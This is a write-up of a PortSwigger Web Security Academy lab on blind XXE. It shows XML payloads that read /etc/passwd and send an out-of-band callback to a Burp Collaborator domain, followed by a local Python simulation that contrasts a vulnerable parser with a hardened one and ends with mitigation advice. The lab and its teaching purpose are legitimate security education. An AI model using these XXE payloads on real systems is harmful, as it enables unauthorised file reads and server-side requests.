| Field | Value |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | Blind XXE — Out-of-Band Detection |
| Difficulty | Practitioner |
| Objective | Trigger a DNS lookup and HTTP request to Burp Collaborator via XXE |
Blind XXE with Out-of-Band Interaction — Writeup¶
Initial Observation¶
Same stock-check endpoint as the previous XXE labs, and the request body is still XML. This time, though, whatever we put in `productId` does not come back in the response:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<stockCheck><productId>teto</productId><storeId>teto</storeId></stockCheck>
```

Response: `Invalid product ID`
Trying the file-retrieval payload from the previous lab confirms that nothing is reflected:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE teto [ <!ENTITY miku SYSTEM "file:///etc/passwd">]>
<stockCheck><productId>&miku;</productId><storeId>1</storeId></stockCheck>
```

Still just `Invalid product ID`. That tells us nothing about whether the entity was resolved: the parser may well have read `/etc/passwd` and substituted it into `productId`, only for the application to reject the result because it is not a valid product ID. No reflection and no parser error in the response means we are in blind XXE territory.
Attack Path¶
Out-of-Band Detection via Collaborator¶
Since nothing comes back in the response, we need a side channel to confirm that the parser resolves external entities. Generate a Burp Collaborator payload and point the entity at it, referencing the entity from `productId`; the entity has to be referenced, not just declared, or the parser never dereferences the URL. If the parser fetches it, Collaborator records the DNS lookup and then the HTTP request:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE teto [ <!ENTITY miku SYSTEM "https://moexl8zvsrqt1zpv7uo0zmny0p6guaiz.oastify.com">]>
<stockCheck><productId>&miku;</productId><storeId>1</storeId></stockCheck>
```
Collaborator receives the interaction: a DNS lookup for the payload subdomain, followed by an HTTP request from the target server (hit "Poll now" in the Collaborator tab if nothing shows up straight away).

The parser resolved the external entity and the server made an outbound HTTP request to our Collaborator domain. Blind XXE confirmed, lab solved :P

One caveat worth knowing on real engagements: if only the DNS lookup shows up and the HTTP request never arrives, the entity was still resolved. The server looked the host up and tried to connect; outbound HTTP was simply blocked by egress filtering. The DNS interaction alone is enough to confirm the injection, which is exactly why a Collaborator hostname is the right thing to put in the entity: DNS is rarely filtered, HTTP often is.
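To make the side channel concrete, here is an added example (not part of the original writeup or the lab) that simulates the whole exchange locally with Python's standard-library expat parser. A tiny HTTP listener on 127.0.0.1 stands in for Burp Collaborator, `stock_check` plays the lab's endpoint in two configurations (one that dereferences any `SYSTEM` identifier, one that refuses external entities), and `build_payload` is the lab payload with the Collaborator domain swapped for the local listener. The catalogue of valid product IDs, the response strings and the listener path are all constructed for the example.

```python
import threading
import urllib.request
import xml.parsers.expat
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed catalogue for the fake stock-check endpoint; anything else is "Invalid product ID".
CATALOGUE = {"1", "2", "3"}


def start_listener():
    """Start a local HTTP listener that stands in for Burp Collaborator.

    Returns the server (its bound port is server.server_address[1]) and a list
    that receives the request path of every hit, in order.
    """
    hits = []

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            hits.append(self.path)
            body = b"oast"  # non-empty so the entity parses as plain character data
            self.send_response(200)
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, *args):  # keep the demo output quiet
            pass

    server = HTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, hits


def build_payload(url):
    """The lab payload with the Collaborator domain replaced by `url` (assumed listener URL)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE teto [ <!ENTITY miku SYSTEM "{url}">]>\n'
        "<stockCheck><productId>&miku;</productId><storeId>1</storeId></stockCheck>"
    )


def stock_check(xml_body, resolve_external):
    """Simulated stock-check endpoint: never echoes what the entity resolved to.

    resolve_external=True reproduces the vulnerable configuration (the parser fetches
    any SYSTEM identifier it meets); False fails closed on any external entity reference.
    """
    fields = {}
    open_elements = []
    parser = xml.parsers.expat.ParserCreate()

    def on_start(name, attrs):
        open_elements.append(name)
        fields.setdefault(name, "")

    def on_end(name):
        open_elements.pop()

    def on_chars(data):
        if open_elements:
            fields[open_elements[-1]] += data  # expat may deliver text in several chunks

    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_chars

    if resolve_external:
        def fetch_entity(context, base, system_id, public_id):
            # Vulnerable behaviour: dereference the URL named in the DTD and splice the
            # result into the document. This outbound request is the out-of-band signal.
            opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
            body = opener.open(system_id, timeout=5).read()
            sub = parser.ExternalEntityParserCreate(context)
            sub.CharacterDataHandler = on_chars
            sub.Parse(body, True)
            return 1
        parser.ExternalEntityRefHandler = fetch_entity
    else:
        def refuse_entity(context, base, system_id, public_id):
            return 0  # tells expat to abort with an external-entity error
        parser.ExternalEntityRefHandler = refuse_entity

    try:
        parser.Parse(xml_body, True)
    except (xml.parsers.expat.ExpatError, OSError):
        return "Invalid product ID"
    product_id = fields.get("productId", "").strip()
    return "Stock check OK" if product_id in CATALOGUE else "Invalid product ID"


def run_demo():
    """Send the lab payload to both configurations; only the listener's log tells them apart."""
    server, hits = start_listener()
    url = f"http://127.0.0.1:{server.server_address[1]}/oast"
    vulnerable = (stock_check(build_payload(url), resolve_external=True), len(hits))
    hardened = (stock_check(build_payload(url), resolve_external=False), len(hits))
    server.shutdown()
    server.server_close()
    return vulnerable, hardened


if __name__ == "__main__":
    (v_resp, v_hits), (h_resp, h_hits) = run_demo()
    print(f"vulnerable parser: response={v_resp!r}, listener hits={v_hits}")
    print(f"hardened parser:   response={h_resp!r}, listener hits={h_hits}")
```

Both configurations answer `Invalid product ID`, which is the point of the lab: the HTTP response is useless as an oracle, and only the listener (Collaborator in the real thing) shows that the vulnerable parser fetched the URL. The hardened variant fails closed by returning 0 from `ExternalEntityRefHandler`, so any external entity reference aborts the parse instead of being silently dropped; whichever library you use, the fix is the same idea, disable external entity and DTD resolution rather than trying to filter `productId`.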